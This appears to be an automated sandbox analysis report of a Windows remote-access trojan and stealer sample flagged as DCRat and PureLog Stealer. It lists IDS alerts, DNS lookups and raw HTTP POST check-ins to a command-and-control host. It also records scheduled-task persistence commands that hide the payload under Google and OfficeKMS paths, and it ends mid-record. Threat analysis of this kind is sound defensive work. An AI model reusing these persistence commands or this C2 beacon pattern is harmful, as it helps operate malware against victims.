                                                    .text | 0x2000 | 0x1ddc94 | 0x1dde00 | 46e917c95129b380d75435a258b660ad | False | 0.7833655873986398 | data | 7.554685403500024 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc | 0x1e0000 | 0x320 | 0x400 | d05b66fd093f5688f9c78aee72f6d256 | False | 0.349609375 | data | 2.6430868172484443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .reloc | 0x1e2000 | 0xc | 0x200 | 0e49983be2bceee4c3b8545a46bc18e9 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                    RT_VERSION | 0x1e0058 | 0x2c8 | data | | | 0.46207865168539325
                                                    DLL | Import
                                                    mscoree.dll | _CorExeMain
                                                    Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                                                    2024-08-29T23:03:52.477023+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49722 | 80 | 192.168.2.5 | 80.211.144.156
                                                    2024-08-29T23:02:53.836158+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49715 | 80 | 192.168.2.5 | 80.211.144.156
                                                    2024-08-29T23:02:12.255649+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49704 | 80 | 192.168.2.5 | 80.211.144.156
                                                    2024-08-29T23:03:01.039318+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49717 | 80 | 192.168.2.5 | 80.211.144.156
                                                    2024-08-29T23:03:44.227003+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49720 | 80 | 192.168.2.5 | 80.211.144.156
                                                    2024-08-29T23:03:47.305110+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49721 | 80 | 192.168.2.5 | 80.211.144.156
                                                    2024-08-29T23:03:10.336992+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49718 | 80 | 192.168.2.5 | 80.211.144.156
                                                    2024-08-29T23:02:57.539412+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49716 | 80 | 192.168.2.5 | 80.211.144.156
                                                    2024-08-29T23:02:45.070506+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49713 | 80 | 192.168.2.5 | 80.211.144.156
                                                    2024-08-29T23:02:37.961096+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49712 | 80 | 192.168.2.5 | 80.211.144.156
                                                    2024-08-29T23:03:35.336473+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49719 | 80 | 192.168.2.5 | 80.211.144.156

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 29, 2024 23:02:11.384500980 CEST | 51577 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 23:02:11.393321037 CEST | 53 | 51577 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 29, 2024 23:02:11.384500980 CEST | 192.168.2.5 | 1.1.1.1 | 0x70d8 | Standard query (0) | 621287cm.n9shteam2.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 29, 2024 23:02:11.393321037 CEST | 1.1.1.1 | 192.168.2.5 | 0x70d8 | No error (0) | 621287cm.n9shteam2.top | | 80.211.144.156 | A (IP address) | IN (0x0001) | false

                                                    • 621287cm.n9shteam2.top

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 80.211.144.156 | 80 | 7096 | C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
Timestamp | Bytes transferred | Direction | Data
Aug 29, 2024 23:02:11.469942093 CEST | 324 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
Aug 29, 2024 23:02:11.821681976 CEST | 344 | OUT | Data Raw: 05 06 01 07 06 0d 01 05 05 06 02 01 02 04 01 07 00 07 05 08 02 03 03 08 01 06 0d 02 03 00 02 09 0a 03 05 0a 03 54 03 07 0b 04 04 03 00 06 05 56 05 03 0c 0a 0e 02 07 0b 07 05 07 04 01 0b 00 0b 02 00 0d 59 07 06 04 01 0b 04 0f 03 0d 53 0e 09 05 54
                                                    Data Ascii: TVYSTZVTU\L}R|^XNt\aOaplyLvo`kcpolopv|C^cd`}O~V@@{}fA~Lq
Aug 29, 2024 23:02:12.252181053 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 29, 2024 23:02:12.255582094 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:02:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.5 | 49712 | 80.211.144.156 | 80
Timestamp | Bytes transferred | Direction | Data
Aug 29, 2024 23:02:37.154726028 CEST | 341 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
Aug 29, 2024 23:02:37.508162022 CEST | 344 | OUT | Data Raw: 00 0b 01 00 06 09 04 07 05 06 02 01 02 0d 01 0b 00 0b 05 0a 02 01 03 08 00 0f 0d 54 06 50 06 00 0e 0e 04 5c 07 06 05 03 0f 03 07 0a 06 53 05 05 04 06 0c 0c 0d 55 04 55 05 0e 04 04 04 0b 07 00 00 0b 0f 5a 05 00 07 51 0f 02 0c 02 0e 03 0e 03 07 00
                                                    Data Ascii: TP\SUUZQS]TQ\L~p~N`\SMuuQP~|~Xtl_|]c^los{ce_|~tAtYQ[}e~V@z}PO~bq
Aug 29, 2024 23:02:37.840049028 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 29, 2024 23:02:37.971899986 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:02:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.2.5 | 49713 | 80.211.144.156 | 80
Timestamp | Bytes transferred | Direction | Data
Aug 29, 2024 23:02:44.321713924 CEST | 341 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
Aug 29, 2024 23:02:44.680301905 CEST | 344 | OUT | Data Raw: 00 05 04 04 06 08 01 0b 05 06 02 01 02 0d 01 02 00 0b 05 0c 02 07 03 01 01 0e 0e 06 05 07 03 52 0e 04 04 0c 03 03 06 00 0e 51 02 01 05 00 04 56 07 03 0d 00 0e 04 06 02 04 55 07 0d 07 03 06 08 05 0b 0e 59 05 51 06 53 0b 0e 0f 07 0d 54 0d 01 04 0c
                                                    Data Ascii: RQVUYQSTP\L~|`}^c[mbeURko}OwR`]tJ{BgH{prDmoR`^lje~V@xmP}L[
Aug 29, 2024 23:02:45.017760992 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 29, 2024 23:02:45.147178888 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:02:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.5 | 49715 | 80.211.144.156 | 80
Timestamp | Bytes transferred | Direction | Data
Aug 29, 2024 23:02:53.121233940 CEST | 341 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
Aug 29, 2024 23:02:53.476984024 CEST | 344 | OUT | Data Raw: 00 0b 01 06 03 0d 01 06 05 06 02 01 02 04 01 0a 00 02 05 0c 02 05 03 0e 02 02 0e 54 04 00 01 06 0e 0e 03 0c 01 02 05 05 0f 04 05 0a 06 04 05 03 06 0b 0c 00 0e 02 06 52 06 54 05 54 06 52 04 01 01 03 0c 09 04 01 05 09 0c 53 0e 00 0c 06 0c 09 07 50
                                                    Data Ascii: TRTTRSP\L~A|N[[cq~\vKxBhl[t`Oh]{_olo`zDhSsQwlLiO~V@@zmr}bi
Aug 29, 2024 23:02:53.795125961 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 29, 2024 23:02:53.923660994 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:02:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port
4 | 192.168.2.5 | 49716 | 80.211.144.156 | 80
Timestamp | Bytes transferred | Direction | Data
Aug 29, 2024 23:02:56.757767916 CEST | 276 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
Aug 29, 2024 23:02:57.102014065 CEST | 344 | OUT | Data Raw: 00 0a 04 0d 06 0e 01 03 05 06 02 01 02 07 01 0b 00 02 05 01 02 06 03 0b 01 00 0e 02 07 01 00 08 0e 0f 07 0e 07 0d 04 06 0e 04 04 05 05 0a 02 00 04 07 0b 0c 0d 01 04 55 06 04 04 51 07 07 04 01 03 06 0c 09 07 05 04 54 0f 0e 0c 57 0e 06 0c 08 05 56
                                                    Data Ascii: UQTWVT\L~N~sjw[uLaoS|it|M`xo{Eo`e^|SlAwttiO~V@Az}r}\}
Aug 29, 2024 23:02:57.493792057 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 29, 2024 23:02:57.681051970 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:02:56 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.2.5 | 49717 | 80.211.144.156 | 80
Timestamp | Bytes transferred | Direction | Data
Aug 29, 2024 23:03:00.331306934 CEST | 324 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
Aug 29, 2024 23:03:00.680107117 CEST | 344 | OUT | Data Raw: 00 01 04 03 06 0a 01 03 05 06 02 01 02 03 01 06 00 07 05 00 02 05 03 01 07 05 0a 01 04 05 02 02 0f 05 06 5a 02 51 03 0a 0e 54 07 51 04 07 05 52 04 51 0f 0c 0d 07 07 07 06 07 06 51 07 03 00 0f 00 05 0d 0d 07 0f 01 00 0b 04 0b 0e 0c 06 0d 06 02 03
                                                    Data Ascii: ZQTQRQQP\L}RYfwv]uK`@|o}wls_hloR^Yx`e_|}hNtIZ~e~V@{mf}b[
Aug 29, 2024 23:03:00.990461111 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 29, 2024 23:03:01.121143103 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    6 | 192.168.2.5 | 49718 | 80.211.144.156 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 29, 2024 23:03:09.064832926 CEST | 323 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:09.414546967 CEST | 344 | OUT | POST body (344 bytes, encoded)
                                                    Aug 29, 2024 23:03:09.726845980 CEST | 344 | OUT | POST body (344 bytes, encoded)
                                                    Aug 29, 2024 23:03:10.121911049 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:10.122101068 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:10.334460974 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:10.399142027 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    7 | 192.168.2.5 | 49719 | 80.211.144.156 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 29, 2024 23:03:34.631613016 CEST | 288 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:34.977133036 CEST | 344 | OUT | POST body (344 bytes, encoded)
                                                    Aug 29, 2024 23:03:35.295924902 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:35.425847054 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    8 | 192.168.2.5 | 49720 | 80.211.144.156 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 29, 2024 23:03:43.516273975 CEST | 288 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:43.867964029 CEST | 344 | OUT | POST body (344 bytes, encoded)
                                                    Aug 29, 2024 23:03:44.184360027 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:44.328583956 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    9 | 192.168.2.5 | 49721 | 80.211.144.156 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 29, 2024 23:03:46.571973085 CEST | 324 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:46.930284977 CEST | 344 | OUT | POST body (344 bytes, encoded)
                                                    Aug 29, 2024 23:03:47.254633904 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:47.389883995 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                    10 | 192.168.2.5 | 49722 | 80.211.144.156 | 80
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 29, 2024 23:03:51.732836008 CEST | 341 | OUT | POST /UpdatelinuxWindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                    Host: 621287cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Aug 29, 2024 23:03:52.086627007 CEST | 344 | OUT | POST body (344 bytes, encoded)
                                                    Aug 29, 2024 23:03:52.408006907 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Aug 29, 2024 23:03:52.537956953 CEST | 175 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 29 Aug 2024 21:03:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64
                                                    Data Ascii: 404 Not Found


                                                    Target ID:0
                                                    Start time:17:01:53
                                                    Start date:29/08/2024
                                                    Path:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\4ra1Fo2Zql.exe"
                                                    Imagebase:0x30000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1995307367.0000000000032000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2064515197.00000000126E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:17:01:56
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:17:01:56
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:17:01:56
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:17:01:56
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"
                                                    Imagebase:0x7ff6d4470000
                                                    File size:2'759'232 bytes
                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:17:01:56
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2144.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP"
                                                    Imagebase:0x7ff746120000
                                                    File size:52'744 bytes
                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"
                                                    Imagebase:0x7ff6d4470000
                                                    File size:2'759'232 bytes
                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                                                    Imagebase:0x430000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 66%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                                                    Imagebase:0xf10000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES22AB.tmp" "c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP"
                                                    Imagebase:0x7ff746120000
                                                    File size:52'744 bytes
                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
